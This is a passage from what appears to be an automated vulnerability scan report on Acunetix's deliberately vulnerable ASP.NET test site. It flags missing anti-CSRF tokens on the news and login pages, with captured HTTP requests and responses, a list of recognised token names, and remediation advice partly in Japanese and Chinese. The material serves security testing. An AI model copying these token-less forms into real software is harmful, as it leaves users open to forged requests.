href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        7. GET http://testaspnet.vulnweb.com/default.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (316 bytes)
          GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        8. GET http://testaspnet.vulnweb.com/login.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" "btnLogin" "cbPersistCookie" "tbPassword" "tbUsername" ].

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 13269
          
          
          Response body (13269 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>login</title>
          		<meta name="vs_showGrid" content="True">
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="frmLogin" method="post" action="login.aspx" id="frmLogin">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['frmLogin'];
          if (!theForm) {
              theForm = document.frmLogin;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8xY+HkfERpF5ijDSZsRL1CxlmHEA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top" align="center">
          						<TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm">
          							<TR>
          								<TD>Username:</TD>
          								<TD align="right">
          									<input name="tbUsername" type="text" id="tbUsername" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD>Password:</TD>
          								<TD align="right">
          									<input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD>
          							</TR>
          							<TR>
          								<TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" />
          									Remember me
          								</TD>
          							</TR>
          							<TR>
          								<TD></TD>
          								<TD align="right">
          									<input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD>
          							</TR>
          						</TABLE>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" 